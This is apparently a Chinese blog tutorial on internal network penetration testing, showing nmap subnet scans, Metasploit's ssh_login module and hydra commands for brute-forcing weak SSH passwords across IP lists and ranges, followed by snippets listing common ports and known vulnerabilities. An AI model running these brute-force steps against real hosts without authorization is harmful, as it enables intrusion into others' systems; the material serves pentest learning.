內網滲透 ssh 22號埠弱密碼爆破

2022-06-01 22:00:10 字數 1248 閱讀 9176

nmap具體使用方法可以參考:

(1)將收集到的活著的ip放到乙個txt資料夾中,利用:nmap -il ip.txt 進行批量掃瞄埠;

或者可以參考:

(2)使用:nmap -pr -on /home/xh/shentou/out.log 192.168.10.0/24 直接 掃瞄乙個網段內所有的ip,掃瞄的結果會儲存在out.log裡面;

參考:(1)在kali機器中,在終端輸入msfconsole,開啟metasploit工具;

(2)先開啟msf 進入ssh_login模組 show options檢視提示。本次使用使用者字典和密碼字典進行ssh爆破。

終端輸入: use auxiliary/scanner/ssh_login

(3)  show options

(4) 準備進行ssh爆破;

設定使用者名稱字典和密碼字典的路徑;設定靶機的ip位址;設定執行緒為20;開始執行;

可以參考:進行批量破解;

./hydra.sh -p ./password.txt -f ./iplist.txt #對檔案中的ip進行破解

./hydra.sh -p ./password.txt -l 192.168.9.0/24 #對網段中的ip進行破解

如下:sudo sh hydra.sh -p /home/xh/shentou/pwd_ssh1.txt -f /home/xh/shentou/22_iplist.txt

內網滲透之域內埠掃瞄

內網滲透測試之域內埠掃瞄 port scanning of intranet pentest in domain 來自我超怕的 通過埠掃瞄主要用於得到埠的banner資訊 埠上執行的服務 發現常見應用的預設埠。快速探測主機是否存在常見的高危埠 metasploit滲透測試利器,提供了很多漏洞利用 掃...

修改linux 預設ssh的22埠

修改預設的22遠端埠 1 vim etc ssh sshd config 去除 prot 22 前注釋,在新增一行 prot 12366 儲存 2 systemctl restart sshd 3 netstat tunpl grep sshd 看是否有對應的新增埠 4 測試新埠連線 5 vim e...

內網滲透常用命令及常見埠漏洞

21 ftp,看是否存在匿名訪問 22 ssh,看是否存在弱口令 80 http,常見web漏洞 443 openssl,心臟出血 445 smb ms08 067 ms17 010 1433 mssql,弱口令 1521 oracle,弱口令 3389 遠端連線桌面 6379 redis未授權訪問...